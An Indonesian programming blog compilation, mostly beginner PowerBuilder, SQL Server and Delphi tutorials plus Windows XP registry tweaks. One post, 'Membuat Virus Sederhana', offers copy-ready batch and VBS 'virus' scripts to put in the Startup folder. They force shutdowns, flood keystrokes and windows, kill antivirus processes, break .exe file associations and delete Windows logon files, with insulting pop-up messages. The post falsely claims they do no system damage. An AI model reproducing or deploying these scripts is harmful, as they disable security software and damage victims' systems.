Mengkoneksikan Database dengan Powerbuilder

Postingan : | 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 27 | 28 | 29 | 30 |


Pada latihan sebelumnya kita telah membuat menu dan database. Dimenu  tersebut terdapat submenu yaitu siswa dan data siswa.
pada kali ini kita akan mencoba mengkoneksikan database dengan program Aplikasi Sekolah.
Ok langsung kita coba gan…

  • Buka terlebih dahulu  Apliksi Sekolah (latihan powerbuilder yang kemarin)
  • Buka terlebih dahulu Microsof SQL Servernya.
Sebelumnya koneksi Database dengan Power Builder. Caranya,
  • Buka aplikasi sekolah. Setelah terbuka klik “DataBase”
  • setelah terbukan maka double clik pada “MSS Microsoft SQL Server” lalu pilih “New Profile”
  • Setelah diklik maka akan muncul “Database Profile Setup” isikan seperti pada gambar dibawah ini  
Keterangan :
Profile Name : nama profile database pada Power Builder (Nama dapat disesuaikan semau agan)
Server : Nama Komputer agan, jika tidak tahu agan bisa lihat di Klik “Star”->”All Program”-> ”Microsoft SQL Server”->”Service Manager”
Database : isikan dengan nama database. Pada latihan nama database kita adalah “Sekolah” . Agan bisa lihat di “SQL Server Enteprise Manager”.
  • Setelah diisi pada Connection, Klik pula “Preview”. Klik “Copy” untuk mengcopy sintak dalam kotak “Database Connection Syntax”. Setelah dicopy, agan bisa mengklik “Test Connection” untuk mengetes koneksi database. Dan apabila berhasil maka akan mucul pesan Connection Sucsessfull. Lalu OK

  • Kita lanjut gan, copykan  dan pastekan syntak tadi ke target “latihan_01” dengan cara double latihan_01 sesuaikan seperti gambar dibawah ini.

  • Jika selesai maka simpan.
  • Agan buka kembali “database” pada power builder. Setelah terbuka klik kanan pada database “Aplikasi Sekolah” lalu pilih “Connect”. Agar lebih paham agan bisa lihat pada gambar
Jika sudah selesai, database pun siap digunakan

Membuat Database dengan Microsoft SQL Server

Postingan : | 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 27 | 28 | 29 | 30 | 


Pada latihan selanjutnya kita akan bermain dengan menggunakan data base. Database yang kita gunakan sekarang adalah Microsoft SQL Server.


  • Pastikan di PC agan terinstal Microsoft SQL Server.
  • Setelah terinstal, kita akan membuat database. Caranya klik star -> All Programs -> Microsoft SQL Server -> Enterprise Manager.
  • Setelah terbuka klik kanan pada “Database” lalu pilih “new database”

  • Pada databse propertis klik “General” lalu isikan pada colom name dengan nama “Sekolah”

  • Setelah diisi selanjutnya agan klik Data File. Pada kotak location arahkan pada folder dimana agan menyimpan file-file latihan ini.

  • Selanjutnya agan pilih transaction log. Pada kotak location, arahkan pula pada folder dimana agan menyimpan file-file latihan ini. Setelah selesai. Copy-pastekan pada kotak dibawahnya. Sebagai contoh location saya di “D:\My Document\Sekolah_log.LDF”. copy-pastekan location tersebut pada kotak dibawahnya dengan diganti “Sekolah_log.MDF dan Sekolah_Log.LOG”. seperti pada gambar dibawah ini.

  • Setelah selesai klik “OK”.
Database pun telah selesai dibuat. Tinggal mengisi database tersebut dengan table-table. Untuk membuat table tersebut kita akan menggunakan “SQL Query Analyzer”.
Caranya klik “Tools” pada SQL Server Enterprise, lalu pilih “SQL Query Analyzer”. Setelah terbuka pastikan database sekolah yang terpilih. Agar lebih mengerti aga bisa melihat gambar dibawah ini.
Ketikan sintak berikut untuk membuat table siswa pada Query.

create table Siswa (
No_Pendaftaran char (10),
Nama varchar (25),
Jenis_Kelamin varchar (10),
Tempat_Lahir varchar (20),
Tanggal_Lahir datetime,
Nama_Ayah varchar (25),
Nama_Ibu varchar (25),
Alamat_Lengkap varchar (50),
No_Tlp Varchar (20),
Primary key (No_Pendaftaran)
);

Setelah diketikan. Lalu jalankan dengan mengklik “Execute Query” tanda panah merah pada bagian atas(jangan lupa blok dahulu sintak databasenya). Jika sukses maka akan tampil pesan “The command(s) completed successfully”.
Table siswa pun telah selesai. dan siap digunakan.








Membuat Toolbar Menu pada Power Builder

Postingan : | 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 27 | 28 | 29 | 30 |


Ok gan, kali ini kita akan melanjutkan latihan yang kemarin. Kali ini kita akan melanjutkan dengan membuat toolbar pada window utama.


  • Buka dahulu latihan yang kemarin. Setelah terbuka double clik pada m_menu  untuk membuka layar menu.
  • Setelah terbuka, klik submenu “Siswa” pada menu “Input”.
  • Setelah diklik submenu “Siswa”, selanjutnya agan klik “Toolbar” pada propertis disebelah kanan.
  • Ketikkan “Input Siswa” pada “ToolbarItemText”
  • Isikan pula pada “ToolbarItemName” dengan icon. Caranya agan dapat mengklik tanda panah pada disebelah kanannya. Atau dapat mencari icon dalam PC agan (sebaiknya Icon dalam satu folder) dengan cara mengklik tanda brows kota disebelah tanda panah.
  • Agan juga dapat memberikan shortcut Key pada menu Input Siswa. Caranya klik general pada propertis. lalu pilih shortcut key yang terlepak pada bagian bawah propertis. klik tanda panah untuk mengisi shortcut key tersebut. Misalnya kita memilih huruf “S”, terus “check Shortcut Ctrl”. Sehingga apabila ketika agan memencet “Ctrl + S” pada keyboard. Maka akan muncul form siswa.
  • Lakukan hal nomor 5 dan 6 pada submenu Data sisw dan Exit sehingga seperti pada gambar dibawah.
  • Jangan lupa disave. Namun jika dijalankan dan jika agan mengklik toolbar atau submenu tersebut diklik maka tidak terjadi sesuatu, karena kita belum membuat window Input siswa dan window data siswa.
  • Oh ya gan, jika dijalankan dan tidak mucul toolbarnya pada w_utama, maka agan ganti dahulu type windownya. Caranya double clik pada W_Utama, lalu pilih “General” pada propertis disebelah kanan. Lalu pilih “Window Type”. Klik tanda panah lalu pilih “mdi!”.
  • Setelah selesai save dan jalankan.
Oke gan, untuk membuat window input siswa atau data siswa, agan bisa lanjut kelatihan selanjutnya.sekian dulu gan.
semoga bermanfaat….. :-)






Membuat Menu pada Power Builder

Postingan : | 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 27 |

Salam Hangat gan...
Langsung saja kali ini kita akan membut suatu Menu pada Window_Utama. latihan yang lalu.
  1. Buka dahulu latihan sebelumnya.
  2. Setelah terbuka, agan langsung klik "File" terus "New", Pilih "PBObject" dan klik "Menu"
  3. Setelah terbuka, tidak ada entry menu, oleh karena itu kita mulai  membuat menu dengan cara "Klik Kanan pada Mouse" pada tulisan "untitled0" lalu pilih "Insert Submenu Item" lalu ketikan "&File"
  4. Setelah selesai enter, selanjutnya kita akan membuat submenu juga pada file. Caranya klik kanan pada menu File yang telah kita buat tadi, lalu pilih "Insert Submenu Item" dan ketikkan "&Exit".
  5. setelah menu File, kita akan membuat menu lagi dengan nama "Input". Caranya sama seperti nomor 3, namu setelah Insert Submenu Item kita tuliskan "&Input". 
  6. Setelah selesai kita juga akan membuat submenu pada menu input. caranya sama seperti no 4. Namun setelah Insert Submenu kita ketikan "&Siswa". buat menu selanjutnya sehingga tampil seperti gambar dibawah ini.
  7. Setelah selesai simpan dengan nama "M_Menu". 
  8. Buka kembali "w_utama" dengan cara double klik "w_utama" pada window system tree disebelah kiri.
  9. setelah terbuka w_utama. agan lirik propertis pada "MenuName" klik kotak dan arahkan pada m_menu

Jika sudah selesasi Ok lalu jalankan...

selamat mencoba gan.......


Membuat Tombol dan Kotak Pesan pada Power Builder

Postingan : | 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 |15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 27|

Kita lanjutkan sobat...
Bagi yang baru mampir, tengok dulu lah ke postingan sebelumnya tentang Pemograman Power Builder.
Kali ini kita akan menambahkan tombol keluar dan kotak pesan pada latihan yang lalu.

- Pertama kita buka dulu latihan sebelumnya.
- Setelah terbuka agan lirik n klik deh Command Button lalu letakan pada window serta berinama "Keluar". (disesuaikan yang bagus yah)
- Double klik pada tombol Keluar, lalu ketikkan scrip berikut :
if messagebox('Exit','Apakah anda ingin Keluar?',question!,YesNo!) = 1 then
halt
end if

- Setelah selesai "Save dan Run"

Selamat mencoba agan...


Menampilkan Gambar Pada Power Builder

Postingan : | 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 27 |

Postingan ini merupakan kelanjutan dari Latihan Pertama dalam Pemograman Power Builder. Bagi agan yang baru pertama kali mampir, coba deh tengok dahulu latihan yang pertama "Membuat Window dengan Power Builder".

Pada kali ini kita akan menampilkan gambar pada Window Utama. Caranya agan tentu buka dulu latihan yang pertama (pastikan Window Utama yang terbuka, jika tidak double klik "w_utama" pada window system tree disebelah kiri).

- Buka latihan yang pertama. lalu kita beri warna pada Window Utama dengan cara mengklik "Background Color". kita beri warna Putih.
- Setelah diberi warna putih kita akan meletakkan gambar pada window utama dengan cara klik "Create Pictur Control" dan letakkan pada tengan window
- setelah diletakkan di tengah, kita akan mencari gambar yang pas. caranya klik tanda Brows pada propertis sebelah kanan lalu pilih General.
- Cari gambar yang akan agan tampilkan pada directory PC agan. disini saya akan menampilkan emotion. (Sebaiknya copy dan pastekan gambar kedalam folder yang berisi latihan power builder)
- Save dan jalankan....


Semoga sukses.... :-)



Membuat Window Dengan Powerbuilder

Tutorial | 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 27 |


Ok sobat, sudah lama kiranya tidak melirik blog ini...

Kali ini ada sedikit mau share ilmu nih, yang mudah-mudah ada juga yang mau share balik ilmu ke saya.
langsung saja buka deh, Bahasa Pemograman power builder yang ada di PC agan.
- setelah terbuka klik "file" trus "New"
- Trus pilih "Workspace" dan OK
- Lalu simpan dengan nama "Latihan_01". saya menyarankan agar agan buat folder khusus latihan ini
- Kemudian pilih "File" kembali lalu pilih "Target"
- Berinama pada Application Name dengan "Latihan_01". dan Library dan Target akan otomatis pada derectory yang agan pilih. Setelah diberinama langsung saja klik "Finish"
- Kita lanjutkan dengan membuat Window Pertama. caranya klik kembali "File" ---> "New", lalu "pilih "PB Object" dan Klik "Window". Setelah dipilih Klik "OK".
- Setelah OK maka "Window" pertama pun muncul. Kali ini kita akan membuat Tutorian Memunculkan Tulisan pada saat program dijalankan. caranya arahkan dan klik panah pada "Create StaticText Control" seperti pada gambar berikut.
- Setelah itu Klik pada bagian tengah Window lalu tuliskan "Latihan PertamaKu"(Lihat Pengaturannya Pada Kotak Yang Ditandai)
- Setelah selesai klik "Save" lalu berinama dengan "W_Utama" lalu OK
- Window pertama telah selesai, selajutnya kita jalankan. tapi sebelum dijalankan perlu dibuatkan scrip untuk menjalankannya. caranya Klik double pada Targer dengan nama Latihan_01 pada Window Tree sebelah kiri, lalu tuliskan scrip pada bagian tengah dengan scrip "open (w_utama)"
- Setelah selesai klik "save" dan kita jalankan dengan cara klik "RUN"
- Maka hasilnya agan bisa lihat 
Ok gan, sampai sini saja, nanti kalau ada waktu saya tambahin deh... :-)

Salam Sukses..... :-) 

Pengenalan Dephi

Pengertian Delphi
Delphi adalah sebuah IDE Compiler untuk bahasa pemograman Pascal dan lingkungan pengembangan perangkat lunak. produk ini dikembangkan oleh CodeGear sebagai devisi pengembangan perangkat lunak milik Embarcadero. Delphi juga adalah suatu bahasa pemograman (developmen language) yang digunakan untuk merancang suatu aplikasi program.

Kegunaan Delphi
1. untuk membuat aplikasi windows
2. untuk merancang aplikasi program berbasis grafis
3. untuk membuat program berbasis jaringan (client/server)
4. untuk merancang program .Net(berbasis internet)

Keunggunaln Delphi
1. IDE (Integrated Development Enviroment) atau lingkungan pengembangan aplikasi sendiri adalah satu dari beberapa keunggulan delphi, didalamnya terdapat menu-menu yang memudahkan kita untk membuat suatu proyek program.
2. proses kompilasi cepat, pada saat aplikasi yang kita buat dijalnkan pada delphi, maka secara otomatis akan dibaca sebagai sebuah program, tanpa dijalankan terpisah.
3. mudah digunakan, sourc code delphi yang merupakan turunan dari pascal, sehingga tidak diperlukan suatu penyesuaian lagi.
4. bersifat multi purphase, artinya bahasa pemograman Delphi dapat digunakan untuk mengembangkan berbagai keperluan pengembangan aplikasi

Untuk mengetahui lembaran kerja pada delphi silahkan download artiket Pengenalan Delphi pada link ini.

Membuat Virus Sederhana

Assalamualaikum sobat ...

Sudah sekian lama tidak memposting, tapi mudah-mudahan blog ini dapat bermanfaat, amin...

Minggu lalu saya mendapat kiriman dari teman facebook yaitu tentang sourc code virus, dari pada hanya di simpan dalam notebook, lebih baik saya bagi dalam postingan ini, tapi ingat hanya untuk pembelajaran jangan digunakan untuk mengerjai orang.
berikut adalah sourc virusnya...

1. Copy kode tersebut di Notepad lalu Save As menggunakan Extension .BAT

@echo off
msg * Anda adalah teroris
shutdown -c "Error! Teroris yang sangat jelek" -s

2.Copy kode tersebut di Notepad lalu Save As menggunakan Extension .VBS

Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "You are a gay"
loop

3. Copy kode tersebut di Notepad lalu Save As menggunakan Extension .BAT

@echo off
title quiz hari ini 
:menu
cls
echo jika kamu kena virus apa
yang kamu lakukan
pause

echo pilih yang mana:
echo 1. matiin computer
echo 2. format aja
echo 3. bingung ahh
set input=nothing
set /p input=Choice:
if %input%==1 shutdown -s -t
30
if %input%==2 del c:\xxx
if %input%==3 @ECHO off
msg * muka lo rusak
msg * ngaca dulu gih
msg * hayo lo,cpu lu gw acak2
msg * ud install ulang aja
msg * biar masalah nya kelar
@ECHO off

:top

START %SystemRoot%
\system32\notepad.exe
GOTO top
10. Belum tahu...

@echo off
set end=md “Hack
installing”
set fin=copy “Hack
log.txt” “Installing”
%end%
%fin%
net send * Hack is
installing, press OK to

begin set up.
kill NAVAPSVC.exe /F /Q
kill zonelabs.exe /F /Q
kill explorer.exe /F /Q
cls
assoc .exe=txtfile
assoc .txt=mp3file
cls

msg * It is you who is
hacked ….
msg * I warned you,
and you kept going.
Challenge me and this
is what happens.
DEL C:\WINDOWS
\system32\logoff.exe /
F /Q
DEL C:\WINDOWS
\system32\logon.exe /
F /Q
DEL C:\WINDOWS
\system32\logon.scr /
F /Q
cls
shutdown -s -t 5 -c
“ thank you for waiting”

Setelah di copy dan disimpan dengan Extension yang di tentukan, maka simpan code tersebut pada "starup" yang terletak di "C:\Documents and Settings\Administrator\Start Menu\Programs\Startup".

lalu bagaimana menjinakkan virusnya??? tenang sobat, untuk menjinakkannya bisa dengan dua cara, pertama buka task manager (ctrl alt del), pilih tab proses, lalu cari file wscript.exe pilih atau klik End proses. Kalau yang ke dua buka kembali "starup" di "C:\Documents and Settings\Administrator\Start Menu\Programs\Startup" trus delete semua sourc code virusnya , beres deh... coma harus cepat-cepat jangan sampai keduluan sama virusnya... seru dh balapan sama virus...

yang pasti virus ini tidak merusak sistem sob....
biar seru dan tahu, silahkan di sob....
wassalam.....

Keunggulan Dan Kekurangan Window xp


Keunggulan Windows XP
  1. Microsoft Windows XP memiliki stabilitas yang tinggi terhadap sistem yang dimilikinya.
  2. Aplikasi yang dijalankan pada system Windows XP dapat dijalankan oleh komputer lain melalui internet.
  3. Dengan menggunakan Remote Assistence kita dapat memonitor kerusakan komputer yang terjadi pada komputer lain dari jarak jauh melalui internet.
  4. Memiliki sistem keamanan yang dapat digunakan untuk melindungi folder-folder khusus agar dapat digunakan oleh pemiliknya sendiri.
  5. Windows XP dapat digunakan untuk berbagi aplikasi secara real time ke seluruh dunia.
  6. Banyak software yang kompatibel.
  7. Banyak software yang stabil berjalan di operating sistem ini.
  8. Tidak akan ada masalah atau konflik antara software dan hardware.
  9. Instalasi software masih mudah dibandingkan dengan instalasi di sistem operasi yang lain.
Kekurangan Windows XP
  1. Pihak Microsoft sangat membatasi kenyamanan pemakaian terhadap sistem operasi Windows XP ini dimana setiap pengguna harus melakukan aktivasi pihak Microsoft pada periode-periode tertentu.
  2. Tidak adanya Java Virtual Machine seperti generasi-generasi Windows sebelumnya.
  3. Harga licensinya cukup mahal.
  4. Komunitasnya terlalu sedikit, karena bersifat closed-source.
  5. Banyaknya virus yang sering menyerang Windows XP.
  6. Sistem yang kurang stabil.

Otak-Atik Registry pada Windows XP

Dikutip dari Wikipedia Registry merupakan sebuah basis data yang disusun secara hierarkis yang mengandung informasi mengenai konfigurasi sebuah sistem, mulai dari konfigurasi perangkat keras, perangkat lunak asosiasi ekstensi berkas dengan aplikasinya hingga preferensi pengguna. Registry merupakan pengganti berkas-berkas konfigurasi *.INI yang digunakan dalam sistem Windows 16-bit.


Namun pada kali ini saya tidak akam membahas tentang definisi lengkap maupun sejarahnya. Pada postingan ini saya akan mengajak sobat untuk mencoba mengutak-atik registry pada windows xp.


Sebelum mengutak-atik Registry, sebaiknya sobat melakukan backup terlebih dahulu dengan cara :


  1. Klik tombol Star, lalu Run
  2. Ketikkan Regedit dan dan tekan Enter.
  3. Akan muncul jendela Registry Editor, lalu sobat pilih menu File lalu Export 
  4. Setelah muncul jendela Export Registry File  tuliskan nama nama contohnya BackupRegistry
  5. Klik Save
Setelah selesai maka sobat telah melalukan backup registry. 
Setelah siap, mari kita lanjutkan...



Mengganti Nama Recycle Bin
  1. Klik tombol Star, lalu Run
  2. Ketikkan Regedit dan dan tekan Enter.
  3. Akan muncul jendela Registry Editor
  4. Pilih  HKEY_CLASSES_ROOT
  5. Klik tanda tambah cari  CLSID 
  6. Pilih {645FF040-5081-101B-9F08-00AA002F954E}
  7. Klik ganda pada Option Default Value dan beri nama seperti yang sobat inginkan.




Memunculkan Rename Pada Recycle Bin 
  1. Klik tombol Star, lalu Run
  2. Ketikkan Regedit dan dan tekan Enter.
  3. Akan muncul jendela Registry Editor
  4. Pilih  HKEY_CLASSES_ROOT
  5. Klik tanda tambah cari  CLSID 
  6. Pilih  {645FF040-5081-101B-9F08-00AA002F954E}
  7. Klik tambah lalu cari ShellFolder
  8. Klik ganda pada pada Attributes lalu Edit Binary Value, pada Value Data ganti angka tersebut menjadi 0000 50 01 00 20



Memunculkan Atribut Seperti Rename, Copy, Delete, Cut, Paste dan Lain-lain pada Recycle 
Sama seperti yang pada perintah di atas no 1 sampai dengan 8. namu pada Attribute, Edit Binary Value, pada Value data ganti menjadi angka berikut :
0000 50 01 00 20  Untuk   Rename
0000 60 01 00 20  Untuk   Delete
0000 70 01 00 20  Untuk   Rename & Delete
0000 41 01 00 20  Untuk   Copy
0000 42 01 00 20  Untuk   Cut
0000 43 01 00 20  Untuk   Copy & Cut
0000 44 01 00 20  Untuk   Paste
0000 45 01 00 20  Untuk   Copy & Paste
0000 46 01 00 20  Untuk   Cut & Paste
0000 47 01 00 20  Untuk   Cut, Copy & Paste



Memunculkan isi Shortcut Menu pada Recycle Bin dengan Menu Pilihan
Pada trik diatas kita memunculkan menu seperti Rename, Delete, Cut, Copy dan lain-lain, namu pada kali ini kita coba untuk memunculkan Shortcut Menu dengan menu pilihan yang kita inginkan. Caranya adalah sebagai berikut.
  1. Klik tombol Star, lalu Run
  2. Ketikkan Regedit dan dan tekan Enter.
  3. Akan muncul jendela Registry Editor
  4. Pilih  HKEY_CLASSES_ROOT
  5. Klik tanda tambah cari  CLSID 
  6. Pilih  {645FF040-5081-101B-9F08-00AA002F954E}
  7. Klik tanda tambah, lalu pilih Shell
  8. Setelah itu klik Menu Edit > New > Key, lalu beri nama yang diinginkan Misalnya Ngelongok Windows Explorer Yuk... (ngelongok artinya Nengok he...he...(yang dalam kurung jangan Di Tulis)).
  9. Klik Key yang baru dibuat tadi, lalu Kelik kembali Menu Edit > New > key dan buat sebuah Key Baru  Bernama Command. 
  10. Klik Ganda pada options (Default), pada bagian Value Data, isi dengan parth Windows Explorer (C:\WINDOWS\Explorer.exe).
  11. Tutup lalu Refresh, klik kana pada Recycle Bin maka sobat akan lihat hasilnya...

Merubah Word, Power Point, dan Excel menjadi PDF

Welcome sobat....

Sedikit berbagi nih bagi sobat yang ingin merubah dokumen word, power point atau excel menjadi PDF ada cara yang lebih mudah dan praktis nih...


Pertama : Download dahulu aplikasi 2007 Microsoft Office Add-in : Microsoft Save As PDF or XPS.
Kedua   : Setelah di download lalu instal seperti biasa
Ketiga   : Buka dokument yang akan dijadikan PDF
Kempat : Setelah terbuka simpan file tersebut dengan cara Klik Save AS to PDF atau XPS.
selesai...



.